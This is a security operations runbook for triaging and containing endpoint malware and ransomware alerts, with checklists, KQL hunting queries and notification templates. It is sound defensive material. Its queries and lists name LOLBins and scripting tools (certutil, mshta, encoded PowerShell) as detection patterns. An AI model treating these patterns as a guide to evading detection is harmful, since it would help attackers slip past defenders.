Runbook: Endpoint Malicious Behavior¶
Runbook Metadata¶
| Field | Value |
|---|---|
| Runbook ID | RB-002 |
| Title | Endpoint Malicious Behavior — Malware / Ransomware / Suspicious Process |
| Version | 1.2 |
| Status | Approved |
| Owner | SOC Tier 2 |
| MITRE ATT&CK | TA0002 (Execution), TA0003 (Persistence), TA0005 (Defense Evasion), TA0040 (Impact) |
| Alert Sources | EDR malware detection, suspicious process execution, ransomware behavior detection, LOLBin abuse |
| Nexus SecOps Controls | Nexus SecOps-031, Nexus SecOps-070, Nexus SecOps-139, Nexus SecOps-140, Nexus SecOps-142 |
| SLA | Critical (ransomware): 5min acknowledgment; High: 15min |
Overview¶
What triggers this runbook: EDR/AV detection of malware, suspicious process execution (PowerShell with encoded commands, LOLBins used offensively), ransomware file encryption behavior, process injection detected, or persistence mechanism creation.
Why this matters: Malware on an endpoint is a potential beachhead for ransomware deployment, data exfiltration, lateral movement, and persistent access. Speed of response is critical — ransomware can encrypt a file server in under 30 minutes from initial execution.
Common causes:
| Cause | TP or FP | Frequency |
|---|---|---|
| Actual malware execution | TP | Low-Medium |
| Penetration test (authorized) | FP | Low |
| Legitimate admin tool (PsExec, WMIC) | FP | Medium |
| Software update process using PowerShell | FP | High |
| False positive from AV/EDR signature | FP | Medium |
| Ransomware encryption behavior | TP | Very Low — CRITICAL if TP |
Triage Steps (Tier 1) — Target: 5 minutes for ransomware; 15 minutes for others¶
If the alert indicates active ransomware file encryption, SKIP to Step 4 immediately.
Step 1: Alert Classification¶
- [ ] 1.1 Identify the alert type:
- ☐ Ransomware behavior (file mass encryption, shadow copy deletion)
- ☐ Known malware family (identified by AV signature)
- ☐ Suspicious PowerShell / script execution
- ☐ LOLBin abuse (certutil, regsvr32, mshta, etc.)
- ☐ Persistence mechanism (registry run key, scheduled task, service)
-
☐ Process injection (into legitimate process)
-
[ ] 1.2 Identify the affected host: ______
- Business criticality: ☐ Critical ☐ High ☐ Standard
- User on the host right now: ______
- Host type: ☐ Workstation ☐ Server ☐ Domain Controller ☐ Cloud VM
Step 2: EDR Console Check¶
Access the EDR console for the affected host immediately:
- [ ] 2.1 Confirm the alert is not a known exception or authorized tool
- [ ] 2.2 Review the process tree: What spawned the suspicious process?
- Parent process: ______
- Child processes: ______
- Command line: ______
- [ ] 2.3 Check: Is the malware process still running? ☐ Yes (active) ☐ No (terminated)
- [ ] 2.4 Check: Has the EDR auto-quarantined the file? ☐ Yes ☐ No
- [ ] 2.5 Identify file path and hash of suspicious executable: ______
Step 3: Rapid Threat Intelligence Check¶
- [ ] 3.1 Search the file hash in TIP / VirusTotal (via integration)
- [ ] 3.2 Search any external IPs the process connected to
- [ ] 3.3 Identify malware family if known: ______
- [ ] 3.4 Are there any CISA/vendor advisories for this family?
Step 4: Ransomware Emergency Protocol¶
RANSOMWARE SUSPECTED — EXECUTE IMMEDIATELY, NOTIFY IN PARALLEL
If the alert shows mass file encryption, shadow copy deletion, or known ransomware behavior:
- Immediately notify: On-call T2 lead + Manager + (if after-hours) incident response phone tree
- Initiate host isolation via EDR console (do NOT wait for approval — time-critical)
- Alert file server team: Check if any file servers were recently accessed from this host
- Disable the affected user account (attacker may have credentials)
- Preserve memory: Trigger EDR memory dump if possible BEFORE isolation
Ransomware playbook trigger: Notify all parties and escalate to Incident Commander.
Investigation Steps (Tier 2)¶
Step 5: Initial Access Investigation¶
Determine how the malware arrived on the host:
// EDR process tree — 4 hours before alert
DeviceProcessEvents
| where DeviceName == "{HOST}"
| where Timestamp between(ago(4h) .. now())
| where ProcessCommandLine has_any("powershell", "cmd", "wscript", "cscript", "mshta")
| project Timestamp, FileName, ProcessCommandLine, InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by Timestamp asc
// Email delivery before malware execution (phishing pivot)
EmailEvents
| where RecipientEmailAddress has "{USER_EMAIL}"
| where Timestamp between(ago(24h) .. alert_time)
| where ThreatTypes has_any("Phish", "Malware")
| project Timestamp, Subject, SenderFromAddress, ThreatTypes, DeliveryAction
- [ ] 5.1 Identify patient zero process (first malicious event in chain)
- [ ] 5.2 Identify initial access vector (phishing, exploit, drive-by, lateral movement from another host)
- [ ] 5.3 Has this malware spread? Check network connections for SMB/RDP lateral movement
Step 6: Scope Assessment¶
// Connections to file servers from affected host
DeviceNetworkEvents
| where DeviceName == "{HOST}"
| where Timestamp > ago(2h)
| where RemotePort in (445, 139, 3389, 5985)
| project Timestamp, RemoteIP, RemotePort, RemoteUrl
| summarize targets=make_set(RemoteIP) by RemotePort
- [ ] 6.1 List hosts this host connected to (potential spread targets): ______
- [ ] 6.2 Has any file server been accessed? ☐ Yes ☐ No
- [ ] 6.3 Is any sensitive data at risk? ☐ Yes ☐ No
- [ ] 6.4 Any signs of data staging for exfiltration (large archive files, cloud upload)?
- [ ] 6.5 Estimated dwell time (first suspicious event): ______
Containment Actions¶
Option A: Host Isolation (Primary)¶
When to use: Active malware, ransomware, C2 communication, active spread
- [ ] Isolation timestamp: ____ UTC
- [ ] Approved by: ______
- [ ] Business impact of isolation: ______
A domain controller or file server isolation will have major business impact. Escalate and notify business owner before isolating these hosts.
Option B: Targeted Process Kill¶
When to use: Malware process identified and isolated; no evidence of persistence; low-impact host
Option C: User Account Containment¶
When to use: Evidence that attacker is using the user's credentials for lateral movement
- Revoke active sessions
- Reset password (coordinate with user/helpdesk)
- Review and revoke suspicious MFA registrations
Evidence Collection¶
Collect in this order (volatility order — most volatile first):
- [ ] Memory dump — via EDR or forensic tool (before isolation if possible)
- [ ] Running process list — EDR snapshot
- [ ] Network connections — active connections snapshot
- [ ] EDR telemetry export — full 72h telemetry for the host
- [ ] Disk image — for legal proceedings or deep forensics
Storage location: [Define per org evidence policy] Chain of custody initiated: ☐ Yes ☐ No
Communication Templates¶
Tier 1 to Tier 2 Escalation (non-ransomware):
Escalating endpoint malware alert on {HOST} ({USER}).
Alert: {ALERT_NAME} at {TIME} UTC
Process: {PROCESS} spawned by {PARENT}
Hash: {HASH} — [VirusTotal: X/XX engines]
Active/Terminated: {STATUS}
EDR quarantined: {YES/NO}
Recommendation: {ASSESS / DECLARE INCIDENT}
Ransomware all-hands notification:
CRITICAL INCIDENT — Ransomware detected
Host: {HOST}
Time: {TIME} UTC
Malware: {FAMILY if known}
Status: Host {ISOLATED/NOT YET ISOLATED}
File server access: {YES/NO}
ACTION REQUIRED:
- Incident Commander: Respond to this bridge
- IT: Check backup status for {FILE SERVERS}
- Network: Review traffic from {HOST SUBNET}
- Management: Stand by for update in 15 minutes
References¶
- T1486 — Data Encrypted for Impact (Ransomware)
- T1059 — Command and Scripting Interpreter
- CISA Ransomware Guide
- No More Ransom Project
- Related: RB-004 — Data Exfiltration
RB-002 v1.2 | Reviewed: 2025-Q4 | Next review: 2026-Q4